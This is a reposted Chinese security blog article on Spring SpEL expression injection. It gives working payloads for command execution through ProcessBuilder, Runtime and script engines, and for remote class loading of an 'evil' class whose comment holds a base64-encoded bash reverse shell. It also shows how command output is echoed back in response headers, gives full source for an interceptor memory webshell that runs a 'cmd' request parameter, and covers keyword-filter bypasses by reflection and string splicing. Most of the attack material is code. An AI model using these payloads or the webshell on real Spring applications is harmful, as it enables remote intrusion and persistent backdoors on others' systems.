devbox
空白诗007
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

[Java安全]Spring SPEL注入总结&回显技术_spring spel表达式注入

作者:空白诗007 | 2024-08-08 07:24:08

spring spel表达式注入

目录

一、SPEL表达式基础

定界符#{}与${}

类型表达式T()

SPEL表达式

变量定义和引用

二、RCE飞雷神一段

ProcessBuilder

Runtime

ScriptEngine

三、RCE飞雷神二段

UrlClassloader

AppClassloader

通过各种方法获取AppClassloader

Bcel字节码

四、霸体螺旋丸回显

BufferedReader

Scanner

ResponseHeader

五、拖入小树林注入内存马

defineClass

ClassLoader

内存马

六、关键字Bypass(编不下去了)

字符串替换

外部对象request

反射+字符串拼贴

一、SPEL表达式基础

参考:
SpEL表达式注入漏洞总结 [ Mi1k7ea ]

定界符#{}与${}

这两个东西一点都不相同,${}只是单纯的一个占位符,会引起一些注入,比如SQL注入之类的。而#{}这就是SPEL特有的定界符。中间的内容会被解析。

类型表达式T()

学SPEL的过程中,总是会看见形如T()这样式儿的payload,很多人不清楚是什么意思。

  1. package com.example.vul;
  2.  
  3. import org.springframework.expression.Expression;
  4. import org.springframework.expression.ExpressionParser;
  5. import org.springframework.expression.spel.standard.SpelExpressionParser;
  6.  
  7. public class SpelVulTest {
  8.     public static void main(String[] args) {
  9.         String cmdStr = "T(java.lang.String)";
  10.  
  11.         ExpressionParser parser = new SpelExpressionParser();//创建解析器
  12.         Expression exp = parser.parseExpression(cmdStr);//解析表达式
  13.         System.out.println( exp.getValue() );//弹出计算器
  14.     }
  15. }
  16.

image.png


T中的内容会被解析为一个类。比如图中的String,还可以解析为java.lang.Runtime,因此也就有了命令执行。

SPEL表达式

一些比较常见的表达式

运算符类型运算符
算数运算+, -, *, /, %, ^
关系运算<, >, ==, <=, >=, lt, gt, eq, le, ge
逻辑运算and, or, not, !
条件运算?:(ternary), ?:(Elvis)
正则表达式matches
运算符符号文本类型
等于==eq
小于<lt
小于等于<=le
大于>gt
大于等于>=ge

这些用的不多,记住就好了。

变量定义和引用

在SpEL表达式中,变量定义通过EvaluationContext类的setVariable(variableName, value)函数来实现;在表达式中使用”#variableName”来引用;除了引用自定义变量,SpEL还允许引用根对象及当前上下文对象:

  • #this:使用当前正在计算的上下文;
  • #root:引用容器的root对象;
  • @something:引用Bean

二、RCE飞雷神一段

纯度宝典第一页
飞雷神一段讲究的是直接RCE的艺术。那么也就对应常见的三种方法。

ProcessBuilder

  1. package com.example.vul;
  2.  
  3. import org.springframework.expression.Expression;
  4. import org.springframework.expression.ExpressionParser;
  5. import org.springframework.expression.spel.standard.SpelExpressionParser;
  6.  
  7. public class SpelVulTest {
  8.     public static void main(String[] args) {
  9.         String cmdStr = "new java.lang.ProcessBuilder(new String[]{\"calc\"}).start()";
  10.  
  11.         ExpressionParser parser = new SpelExpressionParser();//创建解析器
  12.         Expression exp = parser.parseExpression(cmdStr);//解析表达式
  13.         System.out.println( exp.getValue() );//弹出计算器
  14.     }
  15. }
  16.

写这一段代码喝了我2瓶八颗核桃,拉满了真的拉满了。我们Processbuilder真的是太有操作了

image.png

Runtime

  1. package com.example.vul;
  2.  
  3. import org.springframework.expression.Expression;
  4. import org.springframework.expression.ExpressionParser;
  5. import org.springframework.expression.spel.standard.SpelExpressionParser;
  6.  
  7. public class SpelVulTest {
  8.     public static void main(String[] args) {
  9.         String cmdStr = "T(java.lang.Runtime).getRuntime().exec('calc')";
  10.  
  11.         ExpressionParser parser = new SpelExpressionParser();//创建解析器
  12.         Expression exp = parser.parseExpression(cmdStr);//解析表达式
  13.         System.out.println( exp.getValue() );//弹出计算器
  14.     }
  15. }
  16.

什么?还有高手!拉满了真的拉满了,Runtime居然只需要直接用T表达式就可以命令执行?!拉满了!

image.png

ScriptEngine

  1. package com.example.vul;
  2.  
  3. import org.springframework.expression.Expression;
  4. import org.springframework.expression.ExpressionParser;
  5. import org.springframework.expression.spel.standard.SpelExpressionParser;
  6.  
  7. public class SpelVulTest {
  8.     public static void main(String[] args) {
  9.         String cmdStr = "T(javax.script.ScriptEngineManager).getEngineByName(\"nashorn\").eval(\"s=[1];s[0]='calc';java.lang.Runtime.getRuntime().exec(s);\")";
  10.  
  11.         ExpressionParser parser = new SpelExpressionParser();//创建解析器
  12.         Expression exp = parser.parseExpression(cmdStr);//解析表达式
  13.         System.out.println( exp.getValue() );//弹出计算器
  14.     }
  15. }
  16.

image.png


什么?居然报错了,不行大脑已经短路了,容不得我思考。哦!原来是static,因为getEngineByName不是static方法,阴间狡诈,那我们怎么办!

  1. package com.example.vul;
  2.  
  3. import org.springframework.expression.Expression;
  4. import org.springframework.expression.ExpressionParser;
  5. import org.springframework.expression.spel.standard.SpelExpressionParser;
  6.  
  7. public class SpelVulTest {
  8.     public static void main(String[] args) {
  9.         String cmdStr = "new javax.script.ScriptEngineManager().getEngineByName(\"nashorn\").eval(\"s=[1];s[0]='calc';java.lang.Runtime.getRuntime().exec(s);\")";
  10.  
  11.         ExpressionParser parser = new SpelExpressionParser();//创建解析器
  12.         Expression exp = parser.parseExpression(cmdStr);//解析表达式
  13.         System.out.println( exp.getValue() );//弹出计算器
  14.     }
  15. }
  16.  
  1. package com.example.vul;
  2.  
  3. import org.springframework.expression.Expression;
  4. import org.springframework.expression.ExpressionParser;
  5. import org.springframework.expression.spel.standard.SpelExpressionParser;
  6.  
  7. public class SpelVulTest {
  8.     public static void main(String[] args) {
  9.         String cmdStr = "new javax.script.ScriptEngineManager().getEngineByName(\"javascript\").eval(\"s=[1];s[0]='calc';java.lang.Runtime.getRuntime().exec(s);\")";
  10.  
  11.         ExpressionParser parser = new SpelExpressionParser();//创建解析器
  12.         Expression exp = parser.parseExpression(cmdStr);//解析表达式
  13.         System.out.println( exp.getValue() );//弹出计算器
  14.     }
  15. }
  16.

image.png


原来直接new 就可以了,我们JavaScriptengine玩家真的是太有操作了。
不过在这里还是得多一嘴的,其实JavaScriptengine已经可以做很多事情了,比如注入内存马之类的。Js代码是很灵活的。所以需要好好利用。

三、RCE飞雷神二段

纯度秘典第二页,用远程类加载进行RCE。

UrlClassloader

这个方法就是通过远程类加载。代码如下

  1. package com.example.vul;
  2.  
  3. import org.springframework.expression.Expression;
  4. import org.springframework.expression.ExpressionParser;
  5. import org.springframework.expression.spel.standard.SpelExpressionParser;
  6.  
  7. import java.lang.reflect.InvocationTargetException;
  8. import java.net.MalformedURLException;
  9. import java.net.URL;
  10. import java.net.URLClassLoader;
  11.  
  12. public class SpelVulTest {
  13.     public static void main(String[] args) throws MalformedURLException, ClassNotFoundException, InvocationTargetException, InstantiationException, IllegalAccessException {
  14.         String cmdStr = "new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL('http://127.0.0.1:8888/')}).loadClass(\"evil\").getConstructors()[0].newInstance()";
  15.         ExpressionParser parser = new SpelExpressionParser();//创建解析器
  16.         Expression exp = parser.parseExpression(cmdStr);//解析表达式
  17.         System.out.println( exp.getValue() );//弹出计算器
  18.     }
  19. }
  20.

然后那个getconstructors其实也没必要那么写

  1. package com.example.vul;
  2.  
  3. import org.springframework.expression.Expression;
  4. import org.springframework.expression.ExpressionParser;
  5. import org.springframework.expression.spel.standard.SpelExpressionParser;
  6.  
  7. import java.lang.reflect.InvocationTargetException;
  8. import java.net.MalformedURLException;
  9. import java.net.URL;
  10. import java.net.URLClassLoader;
  11.  
  12. public class SpelVulTest {
  13.     public static void main(String[] args) throws MalformedURLException, ClassNotFoundException, InvocationTargetException, InstantiationException, IllegalAccessException {
  14.         String cmdStr = "new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL('http://127.0.0.1:8888/')}).loadClass(\"evil\").newInstance()";
  15.         ExpressionParser parser = new SpelExpressionParser();//创建解析器
  16.         Expression exp = parser.parseExpression(cmdStr);//解析表达式
  17.         System.out.println( exp.getValue() );//弹出计算器
  18.     }
  19. }
  20.  
  1. import com.sun.org.apache.xalan.internal.xsltc.DOM;
  2. import com.sun.org.apache.xalan.internal.xsltc.TransletException;
  3. import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
  4. import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
  5. import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
  6.  
  7. import java.io.IOException;
  8.  
  9. public class evil extends AbstractTranslet {
  10.     static {
  11.         try {
  12.             //Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTQuMTE2LjExOS4yNTMvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}");
  13.             Runtime.getRuntime().exec("calc");
  14.         } catch (IOException e) {
  15.             throw new RuntimeException(e);
  16.         }
  17.  
  18.     }
  19.  
  20.     public static void main(String[] args) {
  21.  
  22.     }
  23.  
  24.     @Override
  25.     public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
  26.  
  27.     }
  28.  
  29.     @Override
  30.     public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
  31.  
  32.     }
  33. }
  34.

然后起个http服务,最后运行就可以加载恶意类了。

image.png

AppClassloader

这种其实大差不差。获取ClassLoader去加载本地的类。

  1. package com.example.vul;
  2.  
  3. import org.springframework.expression.Expression;
  4. import org.springframework.expression.ExpressionParser;
  5. import org.springframework.expression.spel.standard.SpelExpressionParser;
  6.  
  7. import java.lang.reflect.InvocationTargetException;
  8. import java.net.MalformedURLException;
  9. import java.net.URL;
  10. import java.net.URLClassLoader;
  11.  
  12. public class SpelVulTest {
  13.     public static void main(String[] args) throws MalformedURLException, ClassNotFoundException, InvocationTargetException, InstantiationException, IllegalAccessException {
  14.         //String cmdStr = "new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL('http://127.0.0.1:8888/')}).loadClass(\"evil\").getConstructors()[0].newInstance()";
  15.         String cmdStr = "T(java.lang.ClassLoader).getSystemClassLoader().loadClass('java.lang.Runtime').getRuntime().exec('calc')";
  16.         ExpressionParser parser = new SpelExpressionParser();//创建解析器
  17.         Expression exp = parser.parseExpression(cmdStr);//解析表达式
  18.         System.out.println( exp.getValue() );//弹出计算器
  19.     }
  20. }
  21.

image.png

通过各种方法获取AppClassloader

我的纯度在你之上,假如ban掉了一些关键字,我们如何获取classloader成为了问题
有如下几种方法。

  1. T(org.springframework.expression.Expression).getClass().getClassLoader()
  2. #thymeleaf 情况下
  3.  
  4. T(org.thymeleaf.context.AbstractEngineContext).getClass().getClassLoader()
  5. #web服务下通过内置对象
  6.  
  7. {request.getClass().getClassLoader().loadClass(\"java.lang.Runtime\").getMethod(\"getRuntime\").invoke(null).exec(\"touch/tmp/foobar\")}
  8.  
  9. username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('xterm')")]=asdf

只要能获取到都是可以的。

Bcel字节码

这东西其实都不陌生。

T(com.sun.org.apache.bcel.internal.util.JavaWrapper)._main({"BCEL"})}

大概可以是如上形式。
由于SPEL啥都可以做,所以你不用这个类或者用bcel的classloader也可以

四、霸体螺旋丸回显

那么在Web服务中,困扰我们最多的就是回显问题了,命令执行成功了,不出网,怎么把结果带出来呢??!不要着急,翻开纯度宝典第四页。
我的测试代码如下

  1. package com.example.spel.controller;
  2.  
  3. import org.springframework.expression.Expression;
  4. import org.springframework.expression.ExpressionParser;
  5. import org.springframework.expression.spel.SpelParserConfiguration;
  6. import org.springframework.expression.spel.standard.SpelExpressionParser;
  7. import org.springframework.stereotype.Controller;
  8. import org.springframework.web.bind.annotation.RequestMapping;
  9. import org.springframework.web.bind.annotation.ResponseBody;
  10.  
  11. @Controller
  12. public class spelcontroller {
  13.  
  14.     @RequestMapping("/spel")
  15.     @ResponseBody
  16.     public String spelvul(String payload){
  17.         //String cmdStr = "T(java.lang.ClassLoader).getSystemClassLoader().loadClass('java.lang.Runtime').getRuntime().exec('calc')";
  18.         ExpressionParser parser = new SpelExpressionParser(new SpelParserConfiguration());//创建解析器
  19.         Expression exp = parser.parseExpression(payload);//解析表达式
  20.         return (String) exp.getValue();
  21.     }
  22. }
  23.

BufferedReader

其实这并不是纯粹的回显,因为你需要return这个返回结果,而真实情况一般是不会return这个结果的。
payload=new java.io.BufferedReader(new java.io.InputStreamReader(new ProcessBuilder("cmd", "/c", "whoami").start().getInputStream(), "gbk")).readLine()
 

image.png


这只是返回值为输出结果的String而已。

Scanner

和Buffer一样,都只能算得上是半回显
new java.util.Scanner(new java.lang.ProcessBuilder("cmd", "/c", "dir", ".\\").start().getInputStream(), "GBK").useDelimiter("asdasdasdasd").next()
这里的Delimiter是分隔符的意思,我们执行了dir指令,假如想让回显全部显示在一行。那么我们给一点乱七八糟的东西即可

image.png

ResponseHeader

这种方法才称得上是通用回显
这种方法需要有一个方法可以addHeader,可是springboot并不自带这个方法。因此获取到Response有些许困难,需要注册一个response进上下文

  1. @Controller
  2. public class spelcontroller {
  3.  
  4.     @RequestMapping("/spel")
  5.     @ResponseBody
  6.     public String spelvul(String payload,HttpServletResponse response){
  7.         StandardEvaluationContext context=new StandardEvaluationContext();
  8.         context.setVariable("response",response);
  9.         //String cmdStr = "T(java.lang.ClassLoader).getSystemClassLoader().loadClass('java.lang.Runtime').getRuntime().exec('calc')";
  10.         ExpressionParser parser = new SpelExpressionParser(new SpelParserConfiguration());//创建解析器
  11.         Expression exp = parser.parseExpression(payload);//解析表达式
  12.         return (String) exp.getValue(context);
  13.     }
  14. }
  15.  
  1. POST /spel HTTP/1.1
  2. Host: localhost:8080
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
  4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  6. Accept-Encoding: gzip, deflate
  7. Connection: close
  8. Upgrade-Insecure-Requests: 1
  9. Content-Type: application/x-www-form-urlencoded
  10. Content-Length: 180
  11.  
  12. payload=#response.addHeader('x-cmd',new java.io.BufferedReader(new java.io.InputStreamReader(new ProcessBuilder("cmd", "/c", "whoami").start().getInputStream(), "gbk")).readLine())

image.png


这样就可以把命令执行的结果外带出来了。这种方法是比较轻便的。还是围绕着如何获取response这个点。stucts2有util可以直接添加response,所以可以直接外带。

五、拖入小树林注入内存马

纯度宝典第五页,什么response问题我都不在意,我只需要加载我的内存马就足矣!
这里有一个payload模板
#{T(org.springframework.cglib.core.ReflectUtils).defineClass('Memshell',T(org.springframework.util.Base64Utils).decodeFromString('yv66vgAAA....'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).newInstance()}
自己简化后:
T(org.springframework.cglib.core.ReflectUtils).defineClass('InceptorMemShell',T(org.springframework.util.Base64Utils).decodeFromString(''),T(java.lang.Thread).currentThread().getContextClassLoader()).newInstance(),接下来就逐步解析一下这个payload

defineClass

首先我们需要确认我们的目的,我们目的就是加载一个类,并且将其实例化。这里选择了springboot自带的工具类ReflectUtils,因为他识别base64字节,然后加载它。很方便。

ClassLoader

加载一个类需要指定classloader,我们肯定选定当前线程上下文的classLoader
T(java.lang.Thread).currentThread().getContextClassLoader()
第一个payload用到了Mlet这个类
 

image.png


他实际上是URLClassLoader的实现类,所以我个人来说是不知道为啥选Mlet这个。我猜测是兼容问题,因为URLclassloader可以加载任意类吧。不管是远程还是本地的。这个地方注意一下。

内存马

内存马选用的话就springboot内存马就行了。我这里选了一个interceptor内存马

  1. import org.springframework.web.servlet.HandlerInterceptor;
  2. import com.sun.org.apache.xalan.internal.xsltc.DOM;
  3. import com.sun.org.apache.xalan.internal.xsltc.TransletException;
  4. import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
  5. import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
  6. import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
  7. import org.springframework.web.context.WebApplicationContext;
  8. import org.springframework.web.context.request.RequestContextHolder;
  9. import org.springframework.web.servlet.ModelAndView;
  10. import org.springframework.web.servlet.handler.AbstractHandlerMapping;
  11. import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;
  12.  
  13. import javax.servlet.http.HttpServletRequest;
  14. import javax.servlet.http.HttpServletResponse;
  15. import java.lang.reflect.Field;
  16. import java.util.List;
  17.  
  18. public class InceptorMemShell extends AbstractTranslet implements HandlerInterceptor {
  19.  
  20.     static {
  21.         System.out.println("staart");
  22.         WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
  23.         RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
  24.         Field field = null;
  25.         try {
  26.             field = AbstractHandlerMapping.class.getDeclaredField("adaptedInterceptors");
  27.         } catch (NoSuchFieldException e) {
  28.             e.printStackTrace();
  29.         }
  30.         field.setAccessible(true);
  31.         List<HandlerInterceptor> adaptInterceptors = null;
  32.         try {
  33.             adaptInterceptors = (List<HandlerInterceptor>) field.get(mappingHandlerMapping);
  34.         } catch (IllegalAccessException e) {
  35.             e.printStackTrace();
  36.         }
  37.         InceptorMemShell evilInterceptor = new InceptorMemShell();
  38.         adaptInterceptors.add(evilInterceptor);
  39.         System.out.println("ok");
  40.     }
  41.  
  42.     @Override
  43.     public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception {
  44.         String cmd = request.getParameter("cmd");
  45.         if (cmd != null) {
  46.             try {
  47.                 response.setCharacterEncoding("gbk");
  48.                 java.io.PrintWriter printWriter = response.getWriter();
  49.                 ProcessBuilder builder;
  50.                 String o = "";
  51.                 if (System.getProperty("os.name").toLowerCase().contains("win")) {
  52.                     builder = new ProcessBuilder(new String[]{"cmd.exe", "/c", cmd});
  53.                 } else {
  54.                     builder = new ProcessBuilder(new String[]{"/bin/bash", "-c", cmd});
  55.                 }
  56.                 java.util.Scanner c = new java.util.Scanner(builder.start().getInputStream(),"gbk").useDelimiter("wocaosinidema");
  57.                 o = c.hasNext() ? c.next(): o;
  58.                 c.close();
  59.                 printWriter.println(o);
  60.                 printWriter.flush();
  61.                 printWriter.close();
  62.             } catch (Exception e) {
  63.                 e.printStackTrace();
  64.             }
  65.             return false;
  66.         }
  67.         return true;
  68.     }
  69.  
  70.     @Override
  71.     public void postHandle(HttpServletRequest request, HttpServletResponse response, Object handler, ModelAndView modelAndView) throws Exception {
  72.         HandlerInterceptor.super.postHandle(request, response, handler, modelAndView);
  73.     }
  74.  
  75.     @Override
  76.     public void afterCompletion(HttpServletRequest request, HttpServletResponse response, Object handler, Exception ex) throws Exception {
  77.         HandlerInterceptor.super.afterCompletion(request, response, handler, ex);
  78.     }
  79.  
  80.     @Override
  81.     public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
  82.  
  83.     }
  84.  
  85.     @Override
  86.     public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
  87.  
  88.     }
  89. }
  90.

把他变为base64塞入payload之后注入。
 

image.png


这就是我的纯度。

六、关键字Bypass(编不下去了)

纯度宝典最后一页,假如没有技能了怎么办
和一些其他语言的沙盒逃逸一样,想办法找到替代的东西,思路其实大差不差。

字符串替换

形如这样的

  1. T(String).getName()[0].replace(106,104)+T(String).getName()[0].replace(106,51)+T(String).getName()[0].replace(106,122)+T(String).getName()[0].replace(106,104)+T(String).getName()[0].replace(106,49)
  2. #回显h3zh1

T(String).getName返回的是java.lang.String,然后用replace替换获取想要的字符串,这种比较麻烦。

还有一种就是直接使用类似chr函数

T(Character).toString(104)+T(Character).toString(51)+T(Character).toString(122)+T(Character).toString(104)+T(Character).toString(49)

外部对象request

假如上下文中有request对象的话就也有几种方法

  1. //request.getMethod()为POST
  2.  
  3. #request.getMethod().substring(0,1).replace(80,104)%2b#request.getMethod().substring(0,1).replace(80,51)%2b#request.getMethod().substring(0,1).replace(80,122)%2b#request.getMethod().substring(0,1).replace(80,104)%2b#request.getMethod().substring(0,1).replace(80,49)
  4. //request.getMethod()为GET
  5.  
  6. #request.getMethod().substring(0,1).replace(71,104)%2b#request.getMethod().substring(0,1).replace(71,51)%2b#request.getMethod().substring(0,1).replace(71,122)%2b#request.getMethod().substring(0,1).replace(71,104)%2b#request.getMethod().substring(0,1).replace(71,49)
  7.  
  8. //Cookie
  9. #request.getRequestedSessionId()

反射+字符串拼贴

比如Runtime的绕过
T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("ex"+"ec",T(String[])).invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("getRu"+"ntime").invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime")),newString[]{"cmd","/C","calc"})
如果ban了getClass还可以getSuperClass
''.class.getSuperclass().class.forName('java.lang.Runtime').getMethod("ex"+"ec",T(String[])).invoke(''.class.getSuperclass().class.forName('java.lang.Runtime').getMethod("getRu"+"ntime").invoke(null),'calc')
还有各种比如Base64之类的。自己试试就知道了

+V【zkaq222】或者下面的扫码不然通不过哦,免费领取安全学习资料包!(私聊进群一起学习,共同进步)腾讯文档-在线文档icon-default.png?t=N7T8https://docs.qq.com/doc/DYmVETWlZemh0Ymdv

本文作者:Boogipo

文章链接:奇安信攻防社区-[Java安全]Spring SPEL注入总结&&回显技术

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/空白诗007/article/detail/946820
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号